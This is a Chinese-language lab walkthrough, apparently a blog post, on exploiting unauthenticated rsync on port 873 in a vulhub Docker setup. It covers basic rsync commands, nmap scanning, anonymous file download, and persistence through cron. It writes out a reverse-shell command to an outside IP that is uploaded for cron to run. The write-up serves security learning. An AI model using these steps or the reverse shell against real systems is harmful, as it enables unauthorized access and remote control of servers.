介绍
rsync
是一个用于文件和目录同步的强大工具,常用于在本地或远程主机之间复制和同步文件。它不仅支持局域网内的快速文件传输,还可以通过 SSH 进行远程同步。rsync
的主要特点是增量同步,即只传输发生变化的文件部分,从而提高传输效率
如何rsync配置不当,会造成任何人可以未授权访问上传下载服务器文件。端口873
rsync相关命令
(1)本地文件同步
将 /path/to/source/
文件夹同步到 /path/to/destination/
文件夹:
rsync -av /path/to/source/ /path/to/destination/
(2)通过SSH同步文件到远程主机
将本地 /path/to/source/
同步到远程主机 remote_host
的 /path/to/destination/
目录:
rsync -avz -e ssh /path/to/source/ user@remote_host:/path/to/destination/
(3)从远程主机同步文件到本地
将远程主机 remote_host
的 /path/to/source/
目录同步到本地 /path/to/destination/
:
rsync -avz -e ssh user@remote_host:/path/to/source/ /path/to/destination/
(4)删除目标中文件没有的内容
同步本地文件夹 /path/to/source/
到 /path/to/destination/
,并删除目标目录中源目录没有的文件:
rsync -av --delete /path/to/source/ /path/to/destination/
环境
vulhub漏洞docker
漏洞利用
进入环境
data:image/s3,"s3://crabby-images/ada07/ada07ddcb24f5dfafc432e8e9de06045485957b7" alt=""
nmap主机发现
data:image/s3,"s3://crabby-images/29486/29486a4a90bff0e683cb9aa1469d8cc53c6ad4aa" alt=""
发现是136的主机,进行全端口的扫描
data:image/s3,"s3://crabby-images/27f01/27f0146944f27e10c0ffa22525391287c5bd0a5c" alt=""
-sT -sV -O 对873端口扫描服务的端口信息(操作系统版本)
data:image/s3,"s3://crabby-images/f97d1/f97d14ce50879154d53685b0820fd9c10297cd58" alt=""
nmap脚本扫描是否存在RSYNC的未授权访问(有)
data:image/s3,"s3://crabby-images/de0f5/de0f57daef9927e626f55d1a2e5abb07b15fe149" alt=""
用rsync的命令工具命令读取文件
data:image/s3,"s3://crabby-images/facce/facce6ad4768c87d69bb8222d7a3bbebf67178c2" alt=""
查看src模块下的文件
data:image/s3,"s3://crabby-images/3e3ae/3e3aecbdee079c8ec8457a3e20991190b02a7718" alt=""
进行任意文件的下载
任意文件下载
在攻击机看到已经下载在kali机的目录下了
、
查看文件的信息
data:image/s3,"s3://crabby-images/7b155/7b155d2990006863895ee8d9c55a7d6e9ed01cc8" alt=""
查看定时任务并下载在kali里
data:image/s3,"s3://crabby-images/9a2da/9a2da95435c9ae3734bfdee8cfbe4a7279d06051" alt=""
查看文件大概是17分钟用一个/etc/cron.hourly
data:image/s3,"s3://crabby-images/932bb/932bbeba7c9f9b269715141cf34243b20065ca45" alt=""
创建一个shell并写入反弹命令(/bin/bash -i >& /dev/tcp/47.100.167.248/1111 0>&1(写在shell文件里面)
查看写入的命令
data:image/s3,"s3://crabby-images/67808/67808a00ff3a94cd5b86e1fde1fe6193242312a5" alt=""
nc监听
data:image/s3,"s3://crabby-images/92da8/92da86fc6a8c46f1a300d718abce96690ee9c5dc" alt=""
上传shell
data:image/s3,"s3://crabby-images/a0cff/a0cff2c8214d8ddda87f729189963cf901283090" alt=""
如果文章有错请各位大佬指正